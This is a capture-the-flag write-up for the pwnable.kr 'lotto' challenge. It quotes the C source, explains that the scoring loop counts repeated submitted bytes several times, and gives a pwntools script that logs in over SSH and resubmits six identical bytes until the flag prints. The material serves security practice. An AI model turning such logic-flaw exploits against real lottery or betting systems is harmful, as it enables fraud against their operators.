pwnable.kr lotto write-up

Published: 2025/3/21 28 豆豆

ssh lotto@pwnable.kr -p2222 (pw:guest)
Challenge source:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <fcntl.h>
    #include <unistd.h>   // for read() and close(); this include is not in the source as posted

    unsigned char submit[6];

    void play(){
        int i;
        printf("Submit your 6 lotto bytes : ");
        fflush(stdout);

        int r;
        r = read(0, submit, 6);

        printf("Lotto Start!\n");
        //sleep(1);

        // generate lotto numbers
        int fd = open("/dev/urandom", O_RDONLY);
        if(fd==-1){
            printf("error. tell admin\n");
            exit(-1);
        }
        unsigned char lotto[6];
        if(read(fd, lotto, 6) != 6){
            printf("error2. tell admin\n");
            exit(-1);
        }
        for(i=0; i<6; i++){
            lotto[i] = (lotto[i] % 45) + 1;    // 1 ~ 45
        }
        close(fd);

        // calculate lotto score
        // flaw: each lotto[i] is compared with all six submit[j],
        // and repeated values in submit are not rejected
        int match = 0, j = 0;
        for(i=0; i<6; i++){
            for(j=0; j<6; j++){
                if(lotto[i] == submit[j]){
                    match++;
                }
            }
        }

        // win!
        if(match == 6){
            system("/bin/cat flag");
        }
        else{
            printf("bad luck...\n");
        }
    }

    void help(){
        printf("- nLotto Rule -\n");
        printf("nlotto is consisted with 6 random natural numbers less than 46\n");
        printf("your goal is to match lotto numbers as many as you can\n");
        printf("if you win lottery for *1st place*, you will get reward\n");
        printf("for more details, follow the link below\n");
        printf("http://www.nlotto.co.kr/counsel.do?method=playerGuide#buying_guide01\n\n");
        printf("mathematical chance to win this game is known to be 1/8145060.\n");
    }

    int main(int argc, char* argv[]){
        // menu
        unsigned int menu;

        while(1){
            printf("- Select Menu -\n");
            printf("1. Play Lotto\n");
            printf("2. Help\n");
            printf("3. Exit\n");

            scanf("%d", &menu);

            switch(menu){
                case 1:
                    play();
                    break;
                case 2:
                    help();
                    break;
                case 3:
                    printf("bye\n");
                    return 0;
                default:
                    printf("invalid menu\n");
                    break;
            }
        }
        return 0;
    }

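The check has a flaw: the scoring loop compares every lotto byte with every submitted byte, so if we submit the same number six times, for example six 1s, a single 1 in the random lotto array is matched six times.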
payload:

    from pwn import *

    s = ssh(host='pwnable.kr', user='lotto', password='guest', port=2222)
    p = s.process("/home/lotto/lotto")
    print(p.recv())
    p.sendline(b'1')
    print(p.recv())
    # six identical bytes; the value 9 lies inside the 1..45 draw range
    lotto = bytes([9]) * 6
    p.sendline(lotto)
    print(p.recv())
    # keep playing until a round does not answer "bad luck"
    while True:
        p.sendline(b'1')
        print(p.recv())
        p.sendline(lotto)
        back = p.recv()
        if b"bad luck" not in back:
            print(back)
            break
